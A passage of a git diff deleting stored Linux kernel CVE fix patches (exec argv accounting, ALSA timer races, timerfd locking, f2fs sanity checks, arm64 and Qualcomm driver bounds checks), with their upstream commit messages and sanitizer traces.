*/ -+unsigned long stack_guard_gap = 256UL< -Acked-by: Rik van Riel -Acked-by: Michal Hocko -Cc: Alexander Viro -Cc: Qualys Security Advisory -Signed-off-by: Andrew Morton -Signed-off-by: Linus Torvalds -Signed-off-by: Greg Kroah-Hartman - -Change-Id: I9db26a068e9448fb688a87fe3bae876f23483583 ---- - -diff --git a/fs/exec.c b/fs/exec.c -index 5725280..7d5dbc0 100644 ---- a/fs/exec.c -+++ b/fs/exec.c -@@ -196,7 +196,25 @@ - - if (write) { - unsigned long size = bprm->vma->vm_end - bprm->vma->vm_start; -+ unsigned long ptr_size; - struct rlimit *rlim; -+ -+ /* -+ * Since the stack will hold pointers to the strings, we -+ * must account for them as well. -+ * -+ * The size calculation is the entire vma while each arg page is -+ * built, so each time we get here it's calculating how far it -+ * is currently (rather than each call being just the newly -+ * added size from the arg page). As a result, we need to -+ * always add the entire size of the pointers, so that on the -+ * last call to get_arg_page() we'll actually have the entire -+ * correct size. -+ */ -+ ptr_size = (bprm->argc + bprm->envc) * sizeof(void *); -+ if (ptr_size > ULONG_MAX - size) -+ goto fail; -+ size += ptr_size; - - acct_arg_size(bprm, size / PAGE_SIZE); - -@@ -215,13 +233,15 @@ - * to work from. - */ - rlim = current->signal->rlim; -- if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) { -- put_page(page); -- return NULL; -- } -+ if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) -+ goto fail; - } - - return page; -+ -+fail: -+ put_page(page); -+ return NULL; - } - - static void put_arg_page(struct page *page) diff --git a/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch.base64 deleted file mode 100644 index 456c004f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000365/3.10/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file 
diff --git a/Patches/Linux_CVEs/CVE-2017-1000365/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000365/3.18/0002.patch
deleted file mode 100644
index a20274df..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000365/3.18/0002.patch
+++ /dev/null
@@ -1,91 +0,0 @@ -From 2dff2164d171e9c27f2f7fa778d408ecf4d1e1ea Mon Sep 17 00:00:00 2001 -From: Kees Cook -Date: Fri, 23 Jun 2017 15:08:57 -0700 -Subject: fs/exec.c: account for argv/envp pointers - -commit 98da7d08850fb8bdeb395d6368ed15753304aa0c upstream. - -When limiting the argv/envp strings during exec to 1/4 of the stack limit, -the storage of the pointers to the strings was not included. This means -that an exec with huge numbers of tiny strings could eat 1/4 of the stack -limit in strings and then additional space would be later used by the -pointers to the strings. - -For example, on 32-bit with a 8MB stack rlimit, an exec with 1677721 -single-byte strings would consume less than 2MB of stack, the max (8MB / -4) amount allowed, but the pointers to the strings would consume the -remaining additional stack space (1677721 * 4 == 6710884). - -The result (1677721 + 6710884 == 8388605) would exhaust stack space -entirely. Controlling this stack exhaustion could result in -pathological behavior in setuid binaries (CVE-2017-1000365). - -[akpm@linux-foundation.org: additional commenting from Kees] -Fixes: b6a2fea39318 ("mm: variable length argument support") -Link: http://lkml.kernel.org/r/20170622001720.GA32173@beast -Signed-off-by: Kees Cook -Acked-by: Rik van Riel -Acked-by: Michal Hocko -Cc: Alexander Viro -Cc: Qualys Security Advisory -Signed-off-by: Andrew Morton -Signed-off-by: Linus Torvalds -Signed-off-by: Greg Kroah-Hartman ---- - fs/exec.c | 28 ++++++++++++++++++++++++---- - 1 file changed, 24 insertions(+), 4 deletions(-) - -diff --git a/fs/exec.c b/fs/exec.c -index fe9ec45..6fa04b3 100644 ---- a/fs/exec.c -+++ b/fs/exec.c -@@ -199,8 +199,26 @@ static struct page *get_arg_page(struct linux_binprm *bprm, unsigned long pos, - - if (write) { - unsigned long size = bprm->vma->vm_end - bprm->vma->vm_start; -+ unsigned long ptr_size; - struct rlimit *rlim; - -+ /* -+ * Since the stack will hold pointers to the strings, we -+ * must account for them as well. 
-+ * -+ * The size calculation is the entire vma while each arg page is -+ * built, so each time we get here it's calculating how far it -+ * is currently (rather than each call being just the newly -+ * added size from the arg page). As a result, we need to -+ * always add the entire size of the pointers, so that on the -+ * last call to get_arg_page() we'll actually have the entire -+ * correct size. -+ */ -+ ptr_size = (bprm->argc + bprm->envc) * sizeof(void *); -+ if (ptr_size > ULONG_MAX - size) -+ goto fail; -+ size += ptr_size; -+ - acct_arg_size(bprm, size / PAGE_SIZE); - - /* -@@ -218,13 +236,15 @@ static struct page *get_arg_page(struct linux_binprm *bprm, unsigned long pos, - * to work from. - */ - rlim = current->signal->rlim; -- if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) { -- put_page(page); -- return NULL; -- } -+ if (size > READ_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) -+ goto fail; - } - - return page; -+ -+fail: -+ put_page(page); -+ return NULL; - } - - static void put_arg_page(struct page *page) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0001.patch deleted file mode 100644 index 1bf26f3f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0001.patch +++ /dev/null 
@@ -1,56 +0,0 @@ -From ba3021b2c79b2fa9114f92790a99deb27a65b728 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Fri, 2 Jun 2017 17:26:56 +0200 -Subject: ALSA: timer: Fix missing queue indices reset at - SNDRV_TIMER_IOCTL_SELECT - -snd_timer_user_tselect() reallocates the queue buffer dynamically, but -it forgot to reset its indices. Since the read may happen -concurrently with ioctl and snd_timer_user_tselect() allocates the -buffer via kmalloc(), this may lead to the leak of uninitialized -kernel-space data, as spotted via KMSAN: - - BUG: KMSAN: use of unitialized memory in snd_timer_user_read+0x6c4/0xa10 - CPU: 0 PID: 1037 Comm: probe Not tainted 4.11.0-rc5+ #2739 - Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 - Call Trace: - __dump_stack lib/dump_stack.c:16 - dump_stack+0x143/0x1b0 lib/dump_stack.c:52 - kmsan_report+0x12a/0x180 mm/kmsan/kmsan.c:1007 - kmsan_check_memory+0xc2/0x140 mm/kmsan/kmsan.c:1086 - copy_to_user ./arch/x86/include/asm/uaccess.h:725 - snd_timer_user_read+0x6c4/0xa10 sound/core/timer.c:2004 - do_loop_readv_writev fs/read_write.c:716 - __do_readv_writev+0x94c/0x1380 fs/read_write.c:864 - do_readv_writev fs/read_write.c:894 - vfs_readv fs/read_write.c:908 - do_readv+0x52a/0x5d0 fs/read_write.c:934 - SYSC_readv+0xb6/0xd0 fs/read_write.c:1021 - SyS_readv+0x87/0xb0 fs/read_write.c:1018 - -This patch adds the missing reset of queue indices. Together with the -previous fix for the ioctl/read race, we cover the whole problem. 
- -Reported-by: Alexander Potapenko -Tested-by: Alexander Potapenko -Cc: -Signed-off-by: Takashi Iwai ---- - sound/core/timer.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/sound/core/timer.c b/sound/core/timer.c -index 1118bd8..cd67d1c 100644 ---- a/sound/core/timer.c -+++ b/sound/core/timer.c -@@ -1618,6 +1618,7 @@ static int snd_timer_user_tselect(struct file *file, - if (err < 0) - goto __err; - -+ tu->qhead = tu->qtail = tu->qused = 0; - kfree(tu->queue); - tu->queue = NULL; - kfree(tu->tqueue); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0002.patch deleted file mode 100644 index 8a55d454..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000380/^4.11/0002.patch +++ /dev/null 
@@ -1,73 +0,0 @@ -From d11662f4f798b50d8c8743f433842c3e40fe3378 Mon Sep 17 00:00:00 2001 -From: Takashi Iwai -Date: Fri, 2 Jun 2017 15:03:38 +0200 -Subject: ALSA: timer: Fix race between read and ioctl - -The read from ALSA timer device, the function snd_timer_user_tread(), -may access to an uninitialized struct snd_timer_user fields when the -read is concurrently performed while the ioctl like -snd_timer_user_tselect() is invoked. We have already fixed the races -among ioctls via a mutex, but we seem to have forgotten the race -between read vs ioctl. - -This patch simply applies (more exactly extends the already applied -range of) tu->ioctl_lock in snd_timer_user_tread() for closing the -race window. - -Reported-by: Alexander Potapenko -Tested-by: Alexander Potapenko -Cc: -Signed-off-by: Takashi Iwai ---- - sound/core/timer.c | 6 ++++-- - 1 file changed, 4 insertions(+), 2 deletions(-) - -diff --git a/sound/core/timer.c b/sound/core/timer.c -index 2f836ca..1118bd8 100644 ---- a/sound/core/timer.c -+++ b/sound/core/timer.c -@@ -1959,6 +1959,7 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer, - - tu = file->private_data; - unit = tu->tread ? 
sizeof(struct snd_timer_tread) : sizeof(struct snd_timer_read); -+ mutex_lock(&tu->ioctl_lock); - spin_lock_irq(&tu->qlock); - while ((long)count - result >= unit) { - while (!tu->qused) { -@@ -1974,7 +1975,9 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer, - add_wait_queue(&tu->qchange_sleep, &wait); - - spin_unlock_irq(&tu->qlock); -+ mutex_unlock(&tu->ioctl_lock); - schedule(); -+ mutex_lock(&tu->ioctl_lock); - spin_lock_irq(&tu->qlock); - - remove_wait_queue(&tu->qchange_sleep, &wait); -@@ -1994,7 +1997,6 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer, - tu->qused--; - spin_unlock_irq(&tu->qlock); - -- mutex_lock(&tu->ioctl_lock); - if (tu->tread) { - if (copy_to_user(buffer, &tu->tqueue[qhead], - sizeof(struct snd_timer_tread))) -@@ -2004,7 +2006,6 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer, - sizeof(struct snd_timer_read))) - err = -EFAULT; - } -- mutex_unlock(&tu->ioctl_lock); - - spin_lock_irq(&tu->qlock); - if (err < 0) -@@ -2014,6 +2015,7 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer, - } - _error: - spin_unlock_irq(&tu->qlock); -+ mutex_unlock(&tu->ioctl_lock); - return result > 0 ? result : err; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-10661/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10661/ANY/0001.patch deleted file mode 100644 index 7c808aa5..00000000 --- a/Patches/Linux_CVEs/CVE-2017-10661/ANY/0001.patch +++ /dev/null 
@@ -1,95 +0,0 @@ -From 1e38da300e1e395a15048b0af1e5305bd91402f6 Mon Sep 17 00:00:00 2001 -From: Thomas Gleixner -Date: Tue, 31 Jan 2017 15:24:03 +0100 -Subject: timerfd: Protect the might cancel mechanism proper - -The handling of the might_cancel queueing is not properly protected, so -parallel operations on the file descriptor can race with each other and -lead to list corruptions or use after free. - -Protect the context for these operations with a seperate lock. - -The wait queue lock cannot be reused for this because that would create a -lock inversion scenario vs. the cancel lock. Replacing might_cancel with an -atomic (atomic_t or atomic bit) does not help either because it still can -race vs. the actual list operation. - -Reported-by: Dmitry Vyukov -Signed-off-by: Thomas Gleixner -Cc: "linux-fsdevel@vger.kernel.org" -Cc: syzkaller -Cc: Al Viro -Cc: linux-fsdevel@vger.kernel.org -Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1701311521430.3457@nanos -Signed-off-by: Thomas Gleixner ---- - fs/timerfd.c | 17 ++++++++++++++--- - 1 file changed, 14 insertions(+), 3 deletions(-) - -diff --git a/fs/timerfd.c b/fs/timerfd.c -index c173cc1..384fa75 100644 ---- a/fs/timerfd.c -+++ b/fs/timerfd.c -@@ -40,6 +40,7 @@ struct timerfd_ctx { - short unsigned settime_flags; /* to show in fdinfo */ - struct rcu_head rcu; - struct list_head clist; -+ spinlock_t cancel_lock; - bool might_cancel; - }; - -@@ -112,7 +113,7 @@ void timerfd_clock_was_set(void) - rcu_read_unlock(); - } - --static void timerfd_remove_cancel(struct timerfd_ctx *ctx) -+static void __timerfd_remove_cancel(struct timerfd_ctx *ctx) - { - if (ctx->might_cancel) { - ctx->might_cancel = false; -@@ -122,6 +123,13 @@ static void timerfd_remove_cancel(struct timerfd_ctx *ctx) - } - } - -+static void timerfd_remove_cancel(struct timerfd_ctx *ctx) -+{ -+ spin_lock(&ctx->cancel_lock); -+ __timerfd_remove_cancel(ctx); -+ spin_unlock(&ctx->cancel_lock); -+} -+ - static bool timerfd_canceled(struct timerfd_ctx *ctx) - 
{ - if (!ctx->might_cancel || ctx->moffs != KTIME_MAX) -@@ -132,6 +140,7 @@ static bool timerfd_canceled(struct timerfd_ctx *ctx) - - static void timerfd_setup_cancel(struct timerfd_ctx *ctx, int flags) - { -+ spin_lock(&ctx->cancel_lock); - if ((ctx->clockid == CLOCK_REALTIME || - ctx->clockid == CLOCK_REALTIME_ALARM) && - (flags & TFD_TIMER_ABSTIME) && (flags & TFD_TIMER_CANCEL_ON_SET)) { -@@ -141,9 +150,10 @@ static void timerfd_setup_cancel(struct timerfd_ctx *ctx, int flags) - list_add_rcu(&ctx->clist, &cancel_list); - spin_unlock(&cancel_lock); - } -- } else if (ctx->might_cancel) { -- timerfd_remove_cancel(ctx); -+ } else { -+ __timerfd_remove_cancel(ctx); - } -+ spin_unlock(&ctx->cancel_lock); - } - - static ktime_t timerfd_get_remaining(struct timerfd_ctx *ctx) -@@ -400,6 +410,7 @@ SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags) - return -ENOMEM; - - init_waitqueue_head(&ctx->wqh); -+ spin_lock_init(&ctx->cancel_lock); - ctx->clockid = clockid; - - if (isalarm(ctx)) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-10662/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10662/ANY/0001.patch deleted file mode 100644 index 89dc91f3..00000000 --- a/Patches/Linux_CVEs/CVE-2017-10662/ANY/0001.patch +++ /dev/null 
@@ -1,53 +0,0 @@ -From b9dd46188edc2f0d1f37328637860bb65a771124 Mon Sep 17 00:00:00 2001 -From: Jin Qian -Date: Tue, 25 Apr 2017 16:28:48 -0700 -Subject: f2fs: sanity check segment count - -F2FS uses 4 bytes to represent block address. As a result, supported -size of disk is 16 TB and it equals to 16 * 1024 * 1024 / 2 segments. - -Signed-off-by: Jin Qian -Signed-off-by: Jaegeuk Kim ---- - fs/f2fs/super.c | 7 +++++++ - include/linux/f2fs_fs.h | 6 ++++++ - 2 files changed, 13 insertions(+) - -diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c -index 97c07a5..4cd3bee 100644 ---- a/fs/f2fs/super.c -+++ b/fs/f2fs/super.c -@@ -1494,6 +1494,13 @@ static int sanity_check_raw_super(struct f2fs_sb_info *sbi, - return 1; - } - -+ if (le32_to_cpu(raw_super->segment_count) > F2FS_MAX_SEGMENT) { -+ f2fs_msg(sb, KERN_INFO, -+ "Invalid segment count (%u)", -+ le32_to_cpu(raw_super->segment_count)); -+ return 1; -+ } -+ - /* check CP/SIT/NAT/SSA/MAIN_AREA area boundary */ - if (sanity_check_area_boundary(sbi, bh)) - return 1; -diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h -index 639cbdf..093549e 100644 ---- a/include/linux/f2fs_fs.h -+++ b/include/linux/f2fs_fs.h -@@ -302,6 +302,12 @@ struct f2fs_nat_block { - #define SIT_ENTRY_PER_BLOCK (PAGE_SIZE / sizeof(struct f2fs_sit_entry)) - - /* -+ * F2FS uses 4 bytes to represent block address. As a result, supported size of -+ * disk is 16 TB and it equals to 16 * 1024 * 1024 / 2 segments. -+ */ -+#define F2FS_MAX_SEGMENT ((16 * 1024 * 1024) / 2) -+ -+/* - * Note that f2fs_sit_entry->vblocks has the following bit-field information. - * [15:10] : allocation type such as CURSEG_XXXX_TYPE - * [9:0] : valid block count --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-10663/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-10663/3.10/0001.patch deleted file mode 100644 index 2b50cc9b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-10663/3.10/0001.patch +++ /dev/null 
@@ -1,57 +0,0 @@ -From 2b97ce290c589827e21838c70c9c5601b663037a Mon Sep 17 00:00:00 2001 -From: Jin Qian -Date: Thu, 11 May 2017 16:15:15 -0700 -Subject: [PATCH] BACKPORT: f2fs: sanity check checkpoint segno and blkoff - -Make sure segno and blkoff read from raw image are valid. - -Fixed conflicts due to missing commit 1e968fdfe69e -("f2fs: introduce f2fs_cp_error for readability") and commit 6bacf52fb58a -("f2fs: add unlikely() macro for compiler more aggressively"). - -(url https://sourceforge.net/p/linux-f2fs/mailman/message/35835945) - -Signed-off-by: Jin Qian -Signed-off-by: Siqi Lin -Bug: 36588520 -Change-Id: Iba66ab97d3d0870ea48b5ef192d9075f225a934a ---- - fs/f2fs/super.c | 18 ++++++++++++++++++ - 1 file changed, 18 insertions(+) - -diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c -index 77b2cd5ddd569..787d51b7b30d7 100644 ---- a/fs/f2fs/super.c -+++ b/fs/f2fs/super.c -@@ -450,6 +450,8 @@ static int sanity_check_ckpt(struct f2fs_sb_info *sbi) - unsigned int total, fsmeta; - struct f2fs_super_block *raw_super = F2FS_RAW_SUPER(sbi); - struct f2fs_checkpoint *ckpt = F2FS_CKPT(sbi); -+ unsigned int main_segs, blocks_per_seg; -+ int i; - - total = le32_to_cpu(raw_super->segment_count); - fsmeta = le32_to_cpu(raw_super->segment_count_ckpt); -@@ -461,6 +463,22 @@ static int sanity_check_ckpt(struct f2fs_sb_info *sbi) - if (fsmeta >= total) - return 1; - -+ main_segs = le32_to_cpu(sbi->raw_super->segment_count_main); -+ blocks_per_seg = sbi->blocks_per_seg; -+ -+ for (i = 0; i < NR_CURSEG_NODE_TYPE; i++) { -+ if (le32_to_cpu(ckpt->cur_node_segno[i]) >= main_segs || -+ le16_to_cpu(ckpt->cur_node_blkoff[i]) >= blocks_per_seg) { -+ return 1; -+ } -+ } -+ for (i = 0; i < NR_CURSEG_DATA_TYPE; i++) { -+ if (le32_to_cpu(ckpt->cur_data_segno[i]) >= main_segs || -+ le16_to_cpu(ckpt->cur_data_blkoff[i]) >= blocks_per_seg) { -+ return 1; -+ } -+ } -+ - if (is_set_ckpt_flags(ckpt, CP_ERROR_FLAG)) { - f2fs_msg(sbi->sb, KERN_ERR, "A bug case: need to run fsck"); - return 1; 
diff --git a/Patches/Linux_CVEs/CVE-2017-10663/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-10663/3.18/0002.patch deleted file mode 100644 index f0c46854..00000000 --- a/Patches/Linux_CVEs/CVE-2017-10663/3.18/0002.patch +++ /dev/null @@ -1,52 +0,0 @@ -From deaeed5b8acdd10c388616bbc57416cf3db213ff Mon Sep 17 00:00:00 2001 -From: Jin Qian -Date: Mon, 15 May 2017 10:45:08 -0700 -Subject: f2fs: sanity check checkpoint segno and blkoff - -Make sure segno and blkoff read from raw image are valid. - -Cc: stable@vger.kernel.org -Signed-off-by: Jin Qian -[Jaegeuk Kim: adjust minor coding style] -Signed-off-by: Jaegeuk Kim ---- - fs/f2fs/super.c | 16 ++++++++++++++++ - 1 file changed, 16 insertions(+) - -diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c -index 375dfab..e04be72 100644 ---- a/fs/f2fs/super.c -+++ b/fs/f2fs/super.c -@@ -1509,6 +1509,8 @@ int sanity_check_ckpt(struct f2fs_sb_info *sbi) - struct f2fs_super_block *raw_super = F2FS_RAW_SUPER(sbi); - struct f2fs_checkpoint *ckpt = F2FS_CKPT(sbi); - unsigned int ovp_segments, reserved_segments; -+ unsigned int main_segs, blocks_per_seg; -+ int i; - - total = le32_to_cpu(raw_super->segment_count); - fsmeta = le32_to_cpu(raw_super->segment_count_ckpt); -@@ -1530,6 +1532,20 @@ int sanity_check_ckpt(struct f2fs_sb_info *sbi) - return 1; - } - -+ main_segs = le32_to_cpu(raw_super->segment_count_main); -+ blocks_per_seg = sbi->blocks_per_seg; -+ -+ for (i = 0; i < NR_CURSEG_NODE_TYPE; i++) { -+ if (le32_to_cpu(ckpt->cur_node_segno[i]) >= main_segs || -+ le16_to_cpu(ckpt->cur_node_blkoff[i]) >= blocks_per_seg) -+ return 1; -+ } -+ for (i = 0; i < NR_CURSEG_DATA_TYPE; i++) { -+ if (le32_to_cpu(ckpt->cur_data_segno[i]) >= main_segs || -+ le16_to_cpu(ckpt->cur_data_blkoff[i]) >= blocks_per_seg) -+ return 1; -+ } -+ - if (unlikely(f2fs_cp_error(sbi))) { - f2fs_msg(sbi->sb, KERN_ERR, "A bug case: need to run fsck"); - return 1; --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-10996/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-10996/ANY/0001.patch
deleted file mode 100644
index 52763a1b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10996/ANY/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@ -From 9f261e5dfe101bbe35043822a89bffa78e080b3b Mon Sep 17 00:00:00 2001 -From: "Se Wang (Patrick) Oh" -Date: Wed, 2 Sep 2015 21:07:47 -0700 -Subject: arm64: Fix out of bound access to compat_hwcap_str - -As compat_hwcap_str[] doesn't end with 'NULL', c_show() -tries to read the next element even after the end of the -array. So add 'NULL' at the end of compat_hwcap_str[]. -Below is the KASan report for referencing. - -BUG: KASan: out of bounds access in c_show+0x110/0x248 at addr ffffffc0011f6370 -Read of size 8 by task pool-1-thread-1/10526 -page:ffffffbac14b39c0 count:1 mapcount:0 mapping: (null) index:0x0 -flags: 0x400(reserved) -page dumped because: kasan: bad access detected -Address belongs to variable compat_hwcap_str+0xb0/0xe0 -CPU: 0 PID: 10526 Comm: pool-1-thread-1 Tainted: G B W 3.18.18-ga7b28e9-11552-ge4a827f #1 -Hardware name: Qualcomm Technologies, Inc. MSM 8996 v2 + PMI8994 MTP (DT) -Call trace: -[] dump_backtrace+0x0/0x1c4 -[] show_stack+0x10/0x1c -[] dump_stack+0x74/0xc8 -[] kasan_report_error+0x2b0/0x408 -[] kasan_report+0x34/0x40 -[] __asan_load8+0x84/0x90 -[] c_show+0x10c/0x248 -[] traverse+0x1a8/0x320 -[] seq_lseek+0x98/0x148 -[] proc_reg_llseek+0xa0/0xd8 -[] vfs_llseek+0x5c/0x70 -[] SyS_lseek+0x48/0x80 -[] compat_SyS_lseek+0xc/0x18 -Memory state around the buggy address: - ffffffc0011f6200: 00 00 fa fa fa fa fa fa 00 03 fa fa fa fa fa fa - ffffffc0011f6280: 04 fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 ->ffffffc0011f6300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa - ^ - ffffffc0011f6380: fa fa fa fa 00 00 00 00 00 00 fa fa fa fa fa fa - ffffffc0011f6400: 02 fa fa fa fa fa fa fa 00 00 00 02 fa fa fa fa - -Change-Id: I5e2098f9a7a676c47a01baf10de3ac1c86265e69 -Signed-off-by: Se Wang (Patrick) Oh ---- - arch/arm64/kernel/setup.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/arch/arm64/kernel/setup.c b/arch/arm64/kernel/setup.c -index 58e7c14..1da40ef 100644 ---- a/arch/arm64/kernel/setup.c -+++ 
b/arch/arm64/kernel/setup.c -@@ -488,7 +488,8 @@ static const char *compat_hwcap_str[] = { - "idivt", - "vfpd32", - "lpae", -- "evtstrm" -+ "evtstrm", -+ NULL - }; - - static const char *compat_hwcap2_str[] = { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-10997/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-10997/3.10/0001.patch deleted file mode 100644 index 2fcd6a1d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-10997/3.10/0001.patch +++ /dev/null 
@@ -1,48 +0,0 @@ -From fae242db5e1943ba878b4fb215fe6e7f1c387a20 Mon Sep 17 00:00:00 2001 -From: Tony Truong -Date: Fri, 6 Jan 2017 14:03:03 -0800 -Subject: msm: pcie: add bounds check for debugfs register write - -Via debugfs nodes, users have the option to read and write to -any PCIe register. To ensure clients do not access registers -outside the PCIe range, add checks to validate the offset clients -provide. - -Bug: 33039685 -Change-Id: Ia35cd04c57f01c21a47962be596bca395b5ca247 -Signed-off-by: Tony Truong ---- - drivers/pci/host/pci-msm.c | 13 ++++++++++--- - 1 file changed, 10 insertions(+), 3 deletions(-) - -diff --git a/drivers/pci/host/pci-msm.c b/drivers/pci/host/pci-msm.c -index 1b80fa1..ffaa059 100644 ---- a/drivers/pci/host/pci-msm.c -+++ b/drivers/pci/host/pci-msm.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1691,8 +1691,15 @@ static void msm_pcie_sel_debug_testcase(struct msm_pcie_dev_t *dev, - dev->res[base_sel - 1].base, - wr_offset, wr_mask, wr_value); - -- msm_pcie_write_reg_field(dev->res[base_sel - 1].base, -- wr_offset, wr_mask, wr_value); -+ base_sel_size = resource_size(dev->res[base_sel - 1].resource); -+ -+ if (wr_offset > base_sel_size - 4 || -+ msm_pcie_check_align(dev, wr_offset)) -+ pr_alert("PCIe: RC%d: Invalid wr_offset: 0x%x. wr_offset should be no more than 0x%x\n", -+ dev->rc_idx, wr_offset, base_sel_size - 4); -+ else -+ msm_pcie_write_reg_field(dev->res[base_sel - 1].base, -+ wr_offset, wr_mask, wr_value); - - break; - case 13: /* dump all registers of base_sel */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-10997/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-10997/4.4/0002.patch deleted file mode 100644 index 6434aa06..00000000 
--- a/Patches/Linux_CVEs/CVE-2017-10997/4.4/0002.patch +++ /dev/null @@ -1,48 +0,0 @@ -From a395a070880acc679e3832b21d96504edbbe4af2 Mon Sep 17 00:00:00 2001 -From: Tony Truong -Date: Fri, 6 Jan 2017 14:03:03 -0800 -Subject: msm: pcie: add bounds check for debugfs register write - -Via debugfs nodes, users have the option to read and write to -any PCIe register. To ensure clients do not access registers -outside the PCIe range, add checks to validate the offset clients -provide. - -Change-Id: Ia35cd04c57f01c21a47962be596bca395b5ca247 -Signed-off-by: Tony Truong ---- - drivers/pci/host/pci-msm.c | 14 +++++++++++--- - 1 file changed, 11 insertions(+), 3 deletions(-) - -diff --git a/drivers/pci/host/pci-msm.c b/drivers/pci/host/pci-msm.c -index 7c8b5e3..cd105a0 100644 ---- a/drivers/pci/host/pci-msm.c -+++ b/drivers/pci/host/pci-msm.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -2414,8 +2414,16 @@ static void msm_pcie_sel_debug_testcase(struct msm_pcie_dev_t *dev, - dev->res[base_sel - 1].base, - wr_offset, wr_mask, wr_value); - -- msm_pcie_write_reg_field(dev->res[base_sel - 1].base, -- wr_offset, wr_mask, wr_value); -+ base_sel_size = resource_size(dev->res[base_sel - 1].resource); -+ -+ if (wr_offset > base_sel_size - 4 || -+ msm_pcie_check_align(dev, wr_offset)) -+ PCIE_DBG_FS(dev, -+ "PCIe: RC%d: Invalid wr_offset: 0x%x. wr_offset should be no more than 0x%x\n", -+ dev->rc_idx, wr_offset, base_sel_size - 4); -+ else -+ msm_pcie_write_reg_field(dev->res[base_sel - 1].base, -+ wr_offset, wr_mask, wr_value); - - break; - case 13: /* dump all registers of base_sel */ --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-10998/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-10998/3.10/0001.patch
deleted file mode 100644
index 8429a974..00000000
--- a/Patches/Linux_CVEs/CVE-2017-10998/3.10/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 9ffb3cdd7279b011a509267caa4a5119fd6346c0 Mon Sep 17 00:00:00 2001
-From: Siena Richard
-Date: Wed, 11 Jan 2017 11:09:24 -0800
-Subject: ASoC: msm: qdsp6v2: extend validation of virtual address
-
-Validate a buffer virtual address is fully within the region before
-returning the region to ensure functionality for an extended edge case.
-
-Change-Id: Iba3e080889980f393d6a9f0afe0231408b92d654
-Signed-off-by: Siena Richard
-CRs-fixed: 1108461
-
-Bug: 38195131
-Change-Id: Ib527a380a857719bff8254be514133528bd64c75
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 07de5a2..42a3ea7 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2017, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -119,7 +119,10 @@ static int audio_aio_ion_lookup_vaddr(struct q6audio_aio *audio, void *addr,
